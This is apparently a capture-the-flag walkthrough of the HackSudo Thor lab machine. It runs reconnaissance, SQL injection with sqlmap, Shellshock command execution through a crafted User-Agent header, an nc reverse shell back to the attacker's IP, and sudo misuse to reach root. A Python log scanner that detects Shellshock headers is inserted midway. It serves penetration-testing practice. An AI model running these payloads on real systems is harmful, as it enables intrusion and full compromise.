nmap -sP 192.168.138.0/24
Host (attacker): 192.168.138.68
Target: 192.168.138.251
nmap -p- 192.168.138.251
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
80/tcp open http
nmap -A 192.168.138.251
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: E8:6F:38:4E:68:3F (Chongqing Fugui Electronics)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
dirsearch -u http://192.168.138.251/
[02:17:22] 302 - 7KB - /admin_home.php -> home.php
[02:17:23] 200 - 489B - /admin_login.php
[02:17:36] 403 - 280B - /cgi-bin/
[02:17:39] 200 - 1KB - /contact.php
[02:17:49] 301 - 318B - /fonts -> http://192.168.138.251/fonts/
[02:17:52] 200 - 278B - /header.php
[02:17:52] 200 - 2KB - /home.php
[02:17:53] 301 - 319B - /images -> http://192.168.138.251/images/
[02:17:53] 200 - 668B - /images/
[02:18:05] 200 - 3KB - /news.php
[02:18:15] 200 - 4KB - /README.md
[02:18:20] 403 - 280B - /server-status
[02:18:20] 403 - 280B - /server-status/
# Visit README.md, which gives away the back-end admin login
However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".
http://192.168.138.251/admin_login.php
# The search box is vulnerable to SQL injection; sqlmap can exploit it with time-based blind injection, but it only yields a pile of useless data
sqlmap -r 1.txt -p search --batch -D hacksudo -T customer --columns
available databases [4]:
[*] hacksudo
[*] information_schema
[*] mysql
[*] performance_schema
Database: hacksudo
[12 tables]
+--------------+
| admin |
| beneficiary1 |
| beneficiary2 |
| beneficiary3 |
| beneficiary4 |
| customer |
| news |
| news_body |
| passbook1 |
| passbook2 |
| passbook3 |
| passbook4 |
+--------------+
Database: hacksudo
Table: admin
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| id | int(11) |
| pwd | char(25) |
| uname | char(25) |
+--------+----------+
+-------+-------------+
| uname | pwd |
+-------+-------------+
| admin | password123 |
+-------+-------------+
# The news.php source contains a record of a hacker intrusion via cgi-bin, which reveals backup.cgi
dirsearch -u http://192.168.138.251/cgi-bin
# Use nmap to scan for details of the Shellshock vulnerability
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.138.251
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>500 Internal Server Error</title>
| </head><body>
| <h1>Internal Server Error</h1>
| <p>The server encountered an internal error or
| misconfiguration and was unable to complete
| your request.</p>
| <p>Please contact the server administrator at
| webmaster@localhost to inform them of the time this error occurred,
| and the actions you performed just before this error.</p>
| <p>More information about this error may be available
| in the server error log.</p>
| <hr>
| <address>Apache/2.4.38 (Debian) Server at 192.168.138.251 Port 80</address>
| </body></html>
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ http://seclists.org/oss-sec/2014/q3/685
|_http-server-header: Apache/2.4.38 (Debian)
# Trigger the vulnerability to execute shell commands
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" http://192.168.138.251/cgi-bin/backup.cgi
# Check whether the nc tool is available
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'which nc'" http://192.168.138.251/cgi-bin/backup.cgi
# Spawn a reverse shell
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.138.68 6666'" http://192.168.138.251/cgi-bin/backup.cgi
# Once the shell is obtained, upgrade it to an interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
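A defender-side companion to the Shellshock steps above, added here and not part of the original write-up: it parses Apache combined-format access-log lines (the sample lines and addresses below are constructed) and flags requests whose User-Agent or Referer carries the Bash function-definition trigger, rating hits against /cgi-bin/ higher because that is the path where the header actually reaches Bash on this box.

```python
import re

# Constructed sample lines in Apache combined log format (not taken from the page).
# Line 2 mirrors the header-based probe against /cgi-bin/backup.cgi shown above.
SAMPLE_LOG = """\
192.168.138.68 - - [21/Dec/2023:02:17:52 +0000] "GET /home.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.138.68 - - [21/Dec/2023:02:30:01 +0000] "GET /cgi-bin/backup.cgi HTTP/1.1" 500 612 "-" "() { :; }; echo;echo;/bin/bash -c 'id'"
192.168.138.68 - - [21/Dec/2023:02:30:05 +0000] "GET /cgi-bin/backup.cgi HTTP/1.1" 200 41 "() { :;}; /bin/bash -c 'which nc'" "curl/7.88.1"
10.0.0.5 - - [21/Dec/2023:02:31:00 +0000] "GET /news.php HTTP/1.1" 200 3072 "-" "() { :; }; echo vulnerable"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Bash treats an environment variable whose value starts with "() {" as a function
# definition; CVE-2014-6271 runs whatever follows the closing brace. The pattern
# tolerates the spacing variants seen in probes ("() { :; };", "() { :;};", "() {:;};").
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')


def is_shellshock(value):
    """True if a header value carries the Bash function-definition trigger."""
    return bool(SHELLSHOCK_RE.search(value))


def scan_access_log(text):
    """Return (ip, path, header, status, severity) for each request whose Referer
    or User-Agent carries a Shellshock payload. Only requests that reach a CGI
    handler can execute Bash, so hits under /cgi-bin/ are rated 'high'."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        parts = m.group("req").split()
        path = parts[1] if len(parts) > 1 else m.group("req")
        for header in ("referer", "ua"):
            if is_shellshock(m.group(header)):
                severity = "high" if path.startswith("/cgi-bin/") else "low"
                findings.append((m.group("ip"), path, header, int(m.group("status")), severity))
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A 500 on a /cgi-bin/ hit (as in the nmap output above) still means the header reached Bash; the error only reflects that the injected output was not valid CGI output, so it should not be treated as a failed attempt.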
# Check sudo privileges: the script /home/thor/./hammer.sh can be run as user thor without a password
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on HackSudoThor:
(thor) NOPASSWD: /home/thor/./hammer.sh
# Run it to switch to user thor
sudo -u thor /home/thor/./hammer.sh
# Read the first flag
cat user.txt
user owned
# Checking again shows that service and cat can be run as root without a password; build the privilege-escalation command
sudo -l
Matching Defaults entries for thor on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thor may run the following commands on HackSudoThor:
(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
# Privilege escalation succeeded
sudo service ../../bin/bash
# Get the final flag
cat proof.txt
rooted
# Box complete
cat root.txt
rooted
HACKSUDO THOR target machine penetration test notes
First published 2023-12-21 17:30:30